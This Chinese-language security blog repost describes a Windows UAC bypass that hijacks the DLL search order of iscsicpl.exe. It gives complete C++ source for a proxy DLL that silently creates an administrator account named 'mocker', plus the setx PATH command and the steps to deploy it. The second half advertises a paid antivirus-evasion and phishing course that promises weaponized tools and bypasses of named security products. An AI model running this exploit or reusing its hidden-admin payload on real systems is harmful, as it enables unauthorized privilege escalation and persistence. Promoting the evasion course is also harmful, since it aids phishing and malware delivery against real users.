文章总结： 本文介绍了一种UAC提权技术，利用Windows系统程序iscsicpl.exe的DLL搜索顺序缺陷，通过修改PATH环境变量并放置恶意DLL实现自动提权。文章提供了完整的代码示例和操作步骤，演示了如何添加管理员用户。后半部分为免杀钓鱼培训课程的广告推广。 综合评分： 75 文章分类： 渗透测试,红队,内网渗透,安全工具,漏洞POC

【UAC提权】侧加载提权手法(文末送福利)

原创

Hello888 Hello888

安全天书

2026年3月25日 15:31 广西

本文所涉及的技术、思路和工具仅用于安全测试和防御研究，切勿将其用于非法入侵或攻击他人系统等目的，一切后果由使用者自行承担！！！

UAC介绍

利用了Windows系统自带程序iscsicpl.exe的DLL搜索顺序缺陷。该程序具有自动提权(autoElevate)特性，运行时会在用户%PATH%环境变量指定的目录中搜索iscsiexe.dll文件。攻击者通过修改当前用户的%PATH%环境变量注册表项，将其指向用户可写的临时目录，并在该目录放置恶意的代理DLL。

代码编写

// iscsiexe.cpp, the payload DLL executed by iscsicpl.exe#include&nbsp;"pch.h"#include&nbsp;<windows.h>#include&nbsp;<stdio.h>#include&nbsp;<tchar.h>#pragma&nbsp;pack(1)// LoadString() for linker#pragma&nbsp;comment(lib,"User32.lib")BOOL&nbsp;APIENTRY DllMain(HMODULE hModule, DWORD &nbsp;ul_reason_for_call, LPVOID lpReserved){&nbsp; &nbsp;&nbsp;static&nbsp;HINSTANCE hL;&nbsp; &nbsp;&nbsp;switch&nbsp;(ul_reason_for_call)&nbsp; &nbsp; {&nbsp; &nbsp;&nbsp;case&nbsp;DLL_PROCESS_ATTACH:&nbsp; &nbsp; &nbsp; &nbsp; hL = LoadLibrary(_T(".\\iscsiexe_org.dll"));&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!hL)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;false;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// execute the command string from the module resource section&nbsp; &nbsp; &nbsp; &nbsp; WinExec("cmd.exe /c net user mocker M0ck3d2024 /add && net localgroup administrators mocker /add",&nbsp;0);&nbsp; &nbsp; &nbsp; &nbsp; WinExec("cmd.exe /c echo hey > c:\\heythere.txt",&nbsp;0);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;&nbsp; &nbsp;&nbsp;case&nbsp;DLL_THREAD_ATTACH:&nbsp; &nbsp;&nbsp;case&nbsp;DLL_THREAD_DETACH:&nbsp; &nbsp;&nbsp;case&nbsp;DLL_PROCESS_DETACH:&nbsp; &nbsp; &nbsp; &nbsp; FreeLibrary(hL);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;return&nbsp;TRUE;}// the proxy DLL mappings for the linker#pragma&nbsp;comment(linker,&nbsp;"/export:SvchostPushServiceGlobals=iscsiexe_org.SvchostPushServiceGlobals")#pragma&nbsp;comment(linker,&nbsp;"/export:ServiceMain=iscsiexe_org.ServiceMain")#pragma&nbsp;comment(linker,&nbsp;"/export:DiscpEstablishServiceLinkage=iscsiexe_org.DiscpEstablishServiceLinkage")

设置环境变量执行

setx PATH "c:\myfolder;%PATH%"

然后把两个DLL文件放到myfolder目录下，去执行iscsicpl.exe成功会添加mocker用户，其他利用方式修改DLL即可！

iscsiexe_org.dll是微软自带的DLL。

iscsiexe.dll是我们自己编译的DLL。

如下图成功执行添加用户！

免杀钓鱼培训课程新上线

课程目录/核心

• 0基础也能冲：全程直播教学，小白也能上手做免杀
• 武器化免杀教学：打包工具+源码+教程，学完直接用于实战
• 拒绝过时技术：紧跟杀软更新，教的都是当下能用的硬技巧
• 包过免杀：详细见课表，给你免杀安排明明白白
• 不止免杀：讲师亲授一线钓鱼思路技巧，教你上鱼
• 一次报名：直播+录播权限+后续技术更新，终身免费学习

课程实战效果

公众号以往的文章里面也有绕过视频，下面是一些截图：

360安全卫士

过360云传查杀

自启动维权

360杀毒

360企业版安全云

火绒6

Defender

微步在线云沙箱

sxf终端防护中心

天晴

还有其他就不一一截图！

适合人群

*** ✔️ 免杀兴趣爱好者

• ✔️安服/WEB手补充免杀钓鱼技术点

• ✔️ 红队进阶师傅，想补齐免杀钓鱼短板

• ✔️ 0基础入门，想学免杀钓鱼，没人带、无门路

• ✔️ 厌倦野路子，想要系统、能落地、不踩坑的实战教学

课程价格及优惠

费用：3699

• 前5名立减300
• 学生立减200元
• 三人成团，每人立减100元
• 以上优惠活动可以叠加，共26节课。一次报名，后续更新课程免费听！

还有活动！！！现在报名送价值100元的圈子优惠券（圈子成员已达300人，也会一直更新）扫码见圈子详情：

报名联系

VX：TLA206011

**

福利环节

关注微信公众号并转发公众号文章到百人群聊或分享至朋友圈即可参与抽奖！中奖者凭转发公众号文章截图领奖！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全天书 Hello888 Hello888《【UAC提权】侧加载提权手法(文末送福利)》